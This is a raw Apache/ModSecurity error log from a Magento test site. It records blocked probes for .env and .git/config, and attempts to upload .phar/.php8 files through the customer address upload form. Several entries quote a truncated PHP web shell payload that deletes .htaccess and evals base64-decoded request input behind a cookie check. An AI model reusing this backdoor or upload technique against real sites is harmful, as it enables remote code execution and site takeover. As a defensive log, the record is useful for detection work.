[Fri Nov 21 12:42:43.153321 2025] [:error] [pid 229752] [client 167.172.158.128:50272] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSBQMwtxB2W0q-9lM_xsHQAAAAk"]
[Fri Nov 21 12:42:43.487792 2025] [:error] [pid 223954] [client 167.172.158.128:50284] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSBQM4PLQdWysfkg-aEKIgAAAAI"]
[Fri Nov 21 12:42:43.488021 2025] [:error] [pid 223954] [client 167.172.158.128:50284] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSBQM4PLQdWysfkg-aEKIgAAAAI"]
[Fri Nov 21 12:42:43.488180 2025] [:error] [pid 223954] [client 167.172.158.128:50284] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSBQM4PLQdWysfkg-aEKIgAAAAI"]
[Fri Nov 21 12:42:43.783128 2025] [:error] [pid 231712] [client 167.172.158.128:50298] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSBQM5zFWOpBlsifZJyvqQAAAAU"]
[Fri Nov 21 12:42:43.783359 2025] [:error] [pid 231712] [client 167.172.158.128:50298] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSBQM5zFWOpBlsifZJyvqQAAAAU"]
[Fri Nov 21 12:42:43.783523 2025] [:error] [pid 231712] [client 167.172.158.128:50298] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSBQM5zFWOpBlsifZJyvqQAAAAU"]
[Fri Nov 21 18:12:43.412421 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Rule 7f573153bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.phar"] [unique_id "aSCdi5zFWOpBlsifZJyvwwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:43.412973 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.phar"] [unique_id "aSCdi5zFWOpBlsifZJyvwwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:43.415870 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.phar"] [unique_id "aSCdi5zFWOpBlsifZJyvwwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:43.416075 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.phar"] [unique_id "aSCdi5zFWOpBlsifZJyvwwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:43.754049 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 3m88364f428d25.php8 found within FILES:custom_attributes[country_id]: 3m88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSCdi5zFWOpBlsifZJyvxAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/m/3m88364f428d25.phar
[Fri Nov 21 18:12:43.754868 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSCdi5zFWOpBlsifZJyvxAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/m/3m88364f428d25.phar
[Fri Nov 21 18:12:43.755054 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSCdi5zFWOpBlsifZJyvxAAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/m/3m88364f428d25.phar
[Fri Nov 21 18:12:44.437671 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Rule 7f573153bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.php8"] [unique_id "aSCdjJzFWOpBlsifZJyvxQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:44.438397 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.php8"] [unique_id "aSCdjJzFWOpBlsifZJyvxQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:44.441413 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.php8"] [unique_id "aSCdjJzFWOpBlsifZJyvxQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 21 18:12:44.441679 2025] [:error] [pid 231712] [client 37.112.223.135:34770] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/m/3m88364f428d25.php8"] [unique_id "aSCdjJzFWOpBlsifZJyvxQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 22 07:25:03.993964 2025] [authz_core:error] [pid 245724] [client 207.154.197.113:44742] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 22 07:25:04.366080 2025] [:error] [pid 245727] [client 207.154.197.113:44768] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSFXQLbnYXfussPXJy0BqgAAAAM"]
[Sat Nov 22 07:25:04.366376 2025] [:error] [pid 245727] [client 207.154.197.113:44768] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSFXQLbnYXfussPXJy0BqgAAAAM"]
[Sat Nov 22 07:25:04.366571 2025] [:error] [pid 245727] [client 207.154.197.113:44768] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSFXQLbnYXfussPXJy0BqgAAAAM"]
[Sat Nov 22 07:25:04.486558 2025] [:error] [pid 245725] [client 207.154.197.113:44782] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSFXQGehVzYRWnHMwn6tKAAAAAE"]
[Sat Nov 22 07:25:04.486786 2025] [:error] [pid 245725] [client 207.154.197.113:44782] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSFXQGehVzYRWnHMwn6tKAAAAAE"]
[Sat Nov 22 07:25:04.486950 2025] [:error] [pid 245725] [client 207.154.197.113:44782] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSFXQGehVzYRWnHMwn6tKAAAAAE"]
[Sat Nov 22 07:25:04.574728 2025] [:error] [pid 248051] [client 207.154.197.113:44796] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSFXQBHsbcWMkRqo3BS5YgAAAAk"]
[Sat Nov 22 07:25:04.575004 2025] [:error] [pid 248051] [client 207.154.197.113:44796] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSFXQBHsbcWMkRqo3BS5YgAAAAk"]
[Sat Nov 22 07:25:04.575190 2025] [:error] [pid 248051] [client 207.154.197.113:44796] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSFXQBHsbcWMkRqo3BS5YgAAAAk"]
[Sun Nov 23 02:53:16.146219 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Rule 7f33cb0afbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSJpDMeatXoUO6wBiGn06gAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.148254 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSJpDMeatXoUO6wBiGn06gAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.151592 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSJpDMeatXoUO6wBiGn06gAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.151824 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSJpDMeatXoUO6wBiGn06gAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 23 02:53:16.301912 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: z688364f428d25.php8 found within FILES:custom_attributes[country_id]: z688364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSJpDMeatXoUO6wBiGn06wAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Sun Nov 23 02:53:16.302730 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSJpDMeatXoUO6wBiGn06wAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Sun Nov 23 02:53:16.302923 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSJpDMeatXoUO6wBiGn06wAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Sun Nov 23 02:53:16.447889 2025] [:error] [pid 264212] [client 144.124.225.151:34806] [client 144.124.225.151] ModSecurity: Rule 7f33cb0afbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSJpDMeatXoUO6wBiGn07AAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
